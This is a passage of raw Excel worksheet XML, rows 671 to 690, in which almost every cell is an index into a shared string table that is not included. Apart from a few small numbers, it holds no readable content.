      <c r="S671" s="12" t="s">
        <v>5114</v>
      </c>
      <c r="T671" s="12" t="s">
        <v>4152</v>
      </c>
      <c r="U671" s="12" t="s">
        <v>5115</v>
      </c>
      <c r="V671" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W671" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X671" s="12">
        <v>3</v>
      </c>
      <c r="Y671" s="12" t="s">
        <v>5116</v>
      </c>
    </row>
    <row r="672" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A672" s="12">
        <v>3115</v>
      </c>
      <c r="B672" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D672" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F672" s="12" t="s">
        <v>28921</v>
      </c>
      <c r="G672" s="12" t="s">
        <v>5117</v>
      </c>
      <c r="H672" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I672" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J672" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K672" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L672" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M672" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N672" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O672" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P672" s="12" t="s">
        <v>4324</v>
      </c>
      <c r="Q672" s="12">
        <v>2.6</v>
      </c>
      <c r="R672" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S672" s="12" t="s">
        <v>5118</v>
      </c>
      <c r="T672" s="12" t="s">
        <v>5119</v>
      </c>
      <c r="U672" s="12" t="s">
        <v>5120</v>
      </c>
      <c r="V672" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W672" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X672" s="12">
        <v>5</v>
      </c>
      <c r="Y672" s="12" t="s">
        <v>5121</v>
      </c>
    </row>
    <row r="673" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A673" s="12">
        <v>3125</v>
      </c>
      <c r="B673" s="12" t="s">
        <v>28922</v>
      </c>
      <c r="C673" s="12" t="s">
        <v>31420</v>
      </c>
      <c r="D673" s="12" t="s">
        <v>28919</v>
      </c>
      <c r="F673" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G673" s="12" t="s">
        <v>5126</v>
      </c>
      <c r="H673" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I673" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J673" s="12" t="s">
        <v>368</v>
      </c>
      <c r="K673" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L673" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M673" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N673" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O673" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P673" s="12" t="s">
        <v>4324</v>
      </c>
      <c r="Q673" s="12">
        <v>2.6</v>
      </c>
      <c r="R673" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S673" s="12" t="s">
        <v>5127</v>
      </c>
      <c r="T673" s="12" t="s">
        <v>5128</v>
      </c>
      <c r="U673" s="12" t="s">
        <v>5129</v>
      </c>
      <c r="V673" s="12" t="s">
        <v>2091</v>
      </c>
      <c r="W673" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X673" s="12">
        <v>4</v>
      </c>
      <c r="Y673" s="12" t="s">
        <v>5130</v>
      </c>
    </row>
    <row r="674" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A674" s="12">
        <v>3134</v>
      </c>
      <c r="B674" s="12" t="s">
        <v>28341</v>
      </c>
      <c r="C674" s="12" t="s">
        <v>28373</v>
      </c>
      <c r="D674" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F674" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G674" s="12" t="s">
        <v>5131</v>
      </c>
      <c r="H674" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I674" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J674" s="12" t="s">
        <v>458</v>
      </c>
      <c r="K674" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L674" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M674" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N674" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O674" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P674" s="12" t="s">
        <v>3798</v>
      </c>
      <c r="Q674" s="12">
        <v>2.6</v>
      </c>
      <c r="R674" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S674" s="12" t="s">
        <v>5132</v>
      </c>
      <c r="T674" s="12" t="s">
        <v>5133</v>
      </c>
      <c r="U674" s="12" t="s">
        <v>5134</v>
      </c>
      <c r="V674" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W674" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X674" s="12">
        <v>4</v>
      </c>
      <c r="Y674" s="12" t="s">
        <v>5135</v>
      </c>
    </row>
    <row r="675" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A675" s="12">
        <v>3151</v>
      </c>
      <c r="B675" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C675" s="12" t="s">
        <v>28361</v>
      </c>
      <c r="D675" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F675" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G675" s="12" t="s">
        <v>5136</v>
      </c>
      <c r="H675" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I675" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J675" s="12" t="s">
        <v>139</v>
      </c>
      <c r="K675" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L675" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M675" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N675" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O675" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P675" s="12" t="s">
        <v>5137</v>
      </c>
      <c r="Q675" s="12">
        <v>2.6</v>
      </c>
      <c r="R675" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S675" s="12" t="s">
        <v>5138</v>
      </c>
      <c r="T675" s="12" t="s">
        <v>5139</v>
      </c>
      <c r="U675" s="12" t="s">
        <v>5140</v>
      </c>
      <c r="V675" s="12" t="s">
        <v>4362</v>
      </c>
      <c r="W675" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X675" s="12">
        <v>1</v>
      </c>
      <c r="Y675" s="12" t="s">
        <v>5141</v>
      </c>
    </row>
    <row r="676" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A676" s="12">
        <v>3156</v>
      </c>
      <c r="B676" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C676" s="12" t="s">
        <v>28361</v>
      </c>
      <c r="D676" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F676" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G676" s="12" t="s">
        <v>28368</v>
      </c>
      <c r="H676" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I676" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J676" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K676" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L676" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M676" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N676" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O676" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P676" s="12" t="s">
        <v>5142</v>
      </c>
      <c r="Q676" s="12">
        <v>2.6</v>
      </c>
      <c r="R676" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S676" s="12" t="s">
        <v>5143</v>
      </c>
      <c r="T676" s="12" t="s">
        <v>5144</v>
      </c>
      <c r="U676" s="12" t="s">
        <v>5145</v>
      </c>
      <c r="V676" s="12" t="s">
        <v>5146</v>
      </c>
      <c r="W676" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X676" s="12">
        <v>5</v>
      </c>
      <c r="Y676" s="12" t="s">
        <v>5147</v>
      </c>
    </row>
    <row r="677" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A677" s="12">
        <v>3161</v>
      </c>
      <c r="B677" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D677" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E677" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F677" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G677" s="12" t="s">
        <v>5148</v>
      </c>
      <c r="H677" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I677" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J677" s="12" t="s">
        <v>201</v>
      </c>
      <c r="K677" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L677" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M677" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N677" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O677" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P677" s="12" t="s">
        <v>5149</v>
      </c>
      <c r="Q677" s="12">
        <v>2.6</v>
      </c>
      <c r="R677" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S677" s="12" t="s">
        <v>5150</v>
      </c>
      <c r="T677" s="12" t="s">
        <v>921</v>
      </c>
      <c r="U677" s="12" t="s">
        <v>5151</v>
      </c>
      <c r="V677" s="12" t="s">
        <v>4176</v>
      </c>
      <c r="W677" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X677" s="12">
        <v>6</v>
      </c>
      <c r="Y677" s="12" t="s">
        <v>5152</v>
      </c>
    </row>
    <row r="678" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A678" s="12">
        <v>3171</v>
      </c>
      <c r="B678" s="12" t="s">
        <v>28923</v>
      </c>
      <c r="C678" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D678" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E678" s="18" t="s">
        <v>31428</v>
      </c>
      <c r="F678" s="12" t="s">
        <v>28919</v>
      </c>
      <c r="G678" s="12" t="s">
        <v>5162</v>
      </c>
      <c r="H678" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I678" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J678" s="12" t="s">
        <v>458</v>
      </c>
      <c r="K678" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L678" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M678" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N678" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O678" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P678" s="12" t="s">
        <v>5163</v>
      </c>
      <c r="Q678" s="12">
        <v>2.6</v>
      </c>
      <c r="R678" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S678" s="12" t="s">
        <v>5164</v>
      </c>
      <c r="T678" s="12" t="s">
        <v>3162</v>
      </c>
      <c r="U678" s="12" t="s">
        <v>5165</v>
      </c>
      <c r="V678" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W678" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X678" s="12">
        <v>25</v>
      </c>
      <c r="Y678" s="12" t="s">
        <v>5166</v>
      </c>
    </row>
    <row r="679" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A679" s="12">
        <v>3175</v>
      </c>
      <c r="B679" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C679" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D679" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E679" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F679" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G679" s="12" t="s">
        <v>5167</v>
      </c>
      <c r="H679" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I679" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J679" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K679" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L679" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M679" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N679" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O679" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P679" s="12" t="s">
        <v>5168</v>
      </c>
      <c r="Q679" s="12">
        <v>2.6</v>
      </c>
      <c r="R679" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S679" s="12" t="s">
        <v>5169</v>
      </c>
      <c r="T679" s="12" t="s">
        <v>3506</v>
      </c>
      <c r="U679" s="12" t="s">
        <v>5170</v>
      </c>
      <c r="V679" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W679" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X679" s="12">
        <v>19</v>
      </c>
      <c r="Y679" s="12" t="s">
        <v>5171</v>
      </c>
    </row>
    <row r="680" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A680" s="12">
        <v>3184</v>
      </c>
      <c r="B680" s="12" t="s">
        <v>28924</v>
      </c>
      <c r="C680" s="12" t="s">
        <v>28925</v>
      </c>
      <c r="D680" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F680" s="12" t="s">
        <v>28919</v>
      </c>
      <c r="G680" s="12" t="s">
        <v>5188</v>
      </c>
      <c r="H680" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I680" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J680" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K680" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L680" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M680" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N680" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O680" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P680" s="12" t="s">
        <v>5189</v>
      </c>
      <c r="Q680" s="12">
        <v>2.6</v>
      </c>
      <c r="R680" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S680" s="12" t="s">
        <v>5190</v>
      </c>
      <c r="T680" s="12" t="s">
        <v>5191</v>
      </c>
      <c r="U680" s="12" t="s">
        <v>3269</v>
      </c>
      <c r="V680" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="W680" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X680" s="12">
        <v>1</v>
      </c>
      <c r="Y680" s="12" t="s">
        <v>5192</v>
      </c>
    </row>
    <row r="681" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A681" s="12">
        <v>3189</v>
      </c>
      <c r="B681" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D681" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F681" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G681" s="12" t="s">
        <v>5193</v>
      </c>
      <c r="H681" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I681" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J681" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K681" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L681" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M681" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N681" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O681" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P681" s="12" t="s">
        <v>5194</v>
      </c>
      <c r="Q681" s="12">
        <v>2.6</v>
      </c>
      <c r="R681" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S681" s="12" t="s">
        <v>5195</v>
      </c>
      <c r="T681" s="12" t="s">
        <v>112</v>
      </c>
      <c r="U681" s="12" t="s">
        <v>5196</v>
      </c>
      <c r="V681" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W681" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X681" s="12">
        <v>3</v>
      </c>
      <c r="Y681" s="12" t="s">
        <v>5197</v>
      </c>
    </row>
    <row r="682" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A682" s="12">
        <v>3190</v>
      </c>
      <c r="B682" s="12" t="s">
        <v>28926</v>
      </c>
      <c r="C682" s="12" t="s">
        <v>29792</v>
      </c>
      <c r="D682" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E682" s="12" t="s">
        <v>31435</v>
      </c>
      <c r="F682" s="12" t="s">
        <v>28916</v>
      </c>
      <c r="G682" s="12" t="s">
        <v>5198</v>
      </c>
      <c r="H682" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I682" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J682" s="12" t="s">
        <v>122</v>
      </c>
      <c r="K682" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L682" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M682" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N682" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O682" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P682" s="12" t="s">
        <v>5194</v>
      </c>
      <c r="Q682" s="12">
        <v>2.6</v>
      </c>
      <c r="R682" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S682" s="12" t="s">
        <v>5199</v>
      </c>
      <c r="T682" s="12" t="s">
        <v>5200</v>
      </c>
      <c r="U682" s="12" t="s">
        <v>5201</v>
      </c>
      <c r="V682" s="12" t="s">
        <v>1864</v>
      </c>
      <c r="W682" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X682" s="12">
        <v>4</v>
      </c>
      <c r="Y682" s="12" t="s">
        <v>5202</v>
      </c>
    </row>
    <row r="683" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A683" s="12">
        <v>3215</v>
      </c>
      <c r="B683" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C683" s="12" t="s">
        <v>28361</v>
      </c>
      <c r="D683" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F683" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G683" s="12" t="s">
        <v>5212</v>
      </c>
      <c r="H683" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I683" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J683" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K683" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L683" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M683" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N683" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O683" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P683" s="12" t="s">
        <v>5210</v>
      </c>
      <c r="Q683" s="12">
        <v>2.6</v>
      </c>
      <c r="R683" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S683" s="12" t="s">
        <v>5213</v>
      </c>
      <c r="T683" s="12" t="s">
        <v>4410</v>
      </c>
      <c r="U683" s="12" t="s">
        <v>5214</v>
      </c>
      <c r="V683" s="12" t="s">
        <v>3527</v>
      </c>
      <c r="W683" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X683" s="12">
        <v>1</v>
      </c>
      <c r="Y683" s="12" t="s">
        <v>5215</v>
      </c>
    </row>
    <row r="684" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A684" s="12">
        <v>3218</v>
      </c>
      <c r="B684" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D684" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F684" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G684" s="12" t="s">
        <v>5216</v>
      </c>
      <c r="H684" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I684" s="12" t="s">
        <v>525</v>
      </c>
      <c r="J684" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K684" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L684" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M684" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N684" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O684" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P684" s="12" t="s">
        <v>5217</v>
      </c>
      <c r="Q684" s="12">
        <v>2.6</v>
      </c>
      <c r="R684" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S684" s="12" t="s">
        <v>5218</v>
      </c>
      <c r="T684" s="12" t="s">
        <v>5219</v>
      </c>
      <c r="U684" s="12" t="s">
        <v>5220</v>
      </c>
      <c r="V684" s="12" t="s">
        <v>130</v>
      </c>
      <c r="W684" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X684" s="12">
        <v>3</v>
      </c>
      <c r="Y684" s="12" t="s">
        <v>5221</v>
      </c>
    </row>
    <row r="685" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A685" s="12">
        <v>3231</v>
      </c>
      <c r="B685" s="12" t="s">
        <v>28261</v>
      </c>
      <c r="C685" s="12" t="s">
        <v>28262</v>
      </c>
      <c r="D685" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E685" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F685" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G685" s="12" t="s">
        <v>5227</v>
      </c>
      <c r="H685" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I685" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J685" s="12" t="s">
        <v>1511</v>
      </c>
      <c r="K685" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L685" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M685" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N685" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O685" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P685" s="12" t="s">
        <v>2856</v>
      </c>
      <c r="Q685" s="12">
        <v>2.6</v>
      </c>
      <c r="R685" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S685" s="12" t="s">
        <v>5228</v>
      </c>
      <c r="T685" s="12" t="s">
        <v>4413</v>
      </c>
      <c r="U685" s="12" t="s">
        <v>5229</v>
      </c>
      <c r="V685" s="12" t="s">
        <v>4413</v>
      </c>
      <c r="W685" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X685" s="12">
        <v>3</v>
      </c>
      <c r="Y685" s="12" t="s">
        <v>5230</v>
      </c>
    </row>
    <row r="686" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A686" s="12">
        <v>3238</v>
      </c>
      <c r="B686" s="12" t="s">
        <v>28928</v>
      </c>
      <c r="D686" s="12" t="s">
        <v>28929</v>
      </c>
      <c r="E686" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F686" s="12" t="s">
        <v>28927</v>
      </c>
      <c r="G686" s="12" t="s">
        <v>5231</v>
      </c>
      <c r="H686" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I686" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J686" s="12" t="s">
        <v>347</v>
      </c>
      <c r="K686" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L686" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M686" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N686" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O686" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P686" s="12" t="s">
        <v>5223</v>
      </c>
      <c r="Q686" s="12">
        <v>2.6</v>
      </c>
      <c r="R686" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S686" s="12" t="s">
        <v>5232</v>
      </c>
      <c r="T686" s="12" t="s">
        <v>3650</v>
      </c>
      <c r="U686" s="12" t="s">
        <v>5233</v>
      </c>
      <c r="V686" s="12" t="s">
        <v>3725</v>
      </c>
      <c r="W686" s="12" t="s">
        <v>5234</v>
      </c>
      <c r="X686" s="12">
        <v>13</v>
      </c>
      <c r="Y686" s="12" t="s">
        <v>5235</v>
      </c>
    </row>
    <row r="687" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A687" s="12">
        <v>3241</v>
      </c>
      <c r="B687" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D687" s="12" t="s">
        <v>28929</v>
      </c>
      <c r="E687" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F687" s="12" t="s">
        <v>28919</v>
      </c>
      <c r="G687" s="12" t="s">
        <v>5236</v>
      </c>
      <c r="H687" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I687" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J687" s="12" t="s">
        <v>2609</v>
      </c>
      <c r="K687" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L687" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M687" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N687" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O687" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P687" s="12" t="s">
        <v>4324</v>
      </c>
      <c r="Q687" s="12">
        <v>2.6</v>
      </c>
      <c r="R687" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S687" s="12" t="s">
        <v>5237</v>
      </c>
      <c r="T687" s="12" t="s">
        <v>5238</v>
      </c>
      <c r="U687" s="12" t="s">
        <v>5239</v>
      </c>
      <c r="V687" s="12" t="s">
        <v>5240</v>
      </c>
      <c r="W687" s="12" t="s">
        <v>5241</v>
      </c>
      <c r="X687" s="12">
        <v>11</v>
      </c>
      <c r="Y687" s="12" t="s">
        <v>5242</v>
      </c>
    </row>
    <row r="688" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A688" s="12">
        <v>3242</v>
      </c>
      <c r="B688" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D688" s="12" t="s">
        <v>28930</v>
      </c>
      <c r="E688" s="12" t="s">
        <v>31472</v>
      </c>
      <c r="F688" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G688" s="12" t="s">
        <v>5243</v>
      </c>
      <c r="H688" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I688" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J688" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K688" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L688" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M688" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N688" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O688" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P688" s="12" t="s">
        <v>4324</v>
      </c>
      <c r="Q688" s="12">
        <v>2.6</v>
      </c>
      <c r="R688" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S688" s="12" t="s">
        <v>5244</v>
      </c>
      <c r="T688" s="12" t="s">
        <v>5238</v>
      </c>
      <c r="U688" s="12" t="s">
        <v>5245</v>
      </c>
      <c r="V688" s="12" t="s">
        <v>4413</v>
      </c>
      <c r="W688" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X688" s="12">
        <v>3</v>
      </c>
      <c r="Y688" s="12" t="s">
        <v>5246</v>
      </c>
    </row>
    <row r="689" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A689" s="12">
        <v>3263</v>
      </c>
      <c r="B689" s="12" t="s">
        <v>28344</v>
      </c>
      <c r="C689" s="12" t="s">
        <v>28260</v>
      </c>
      <c r="D689" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F689" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G689" s="12" t="s">
        <v>5248</v>
      </c>
      <c r="H689" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I689" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J689" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K689" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L689" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M689" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N689" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O689" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P689" s="12" t="s">
        <v>5223</v>
      </c>
      <c r="Q689" s="12">
        <v>2.6</v>
      </c>
      <c r="R689" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S689" s="12" t="s">
        <v>5249</v>
      </c>
      <c r="T689" s="12" t="s">
        <v>5250</v>
      </c>
      <c r="U689" s="12" t="s">
        <v>5251</v>
      </c>
      <c r="V689" s="12" t="s">
        <v>1881</v>
      </c>
      <c r="W689" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X689" s="12">
        <v>5</v>
      </c>
      <c r="Y689" s="12" t="s">
        <v>5252</v>
      </c>
    </row>
    <row r="690" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A690" s="12">
        <v>3273</v>
      </c>
      <c r="B690" s="12" t="s">
        <v>28931</v>
      </c>
      <c r="D690" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F690" s="12" t="s">
        <v>28911</v>
      </c>
      <c r="G690" s="12" t="s">
        <v>5254</v>
      </c>
      <c r="H690" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I690" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J690" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K690" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L690" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M690" s="12" t="s">
        <v>31582</v>
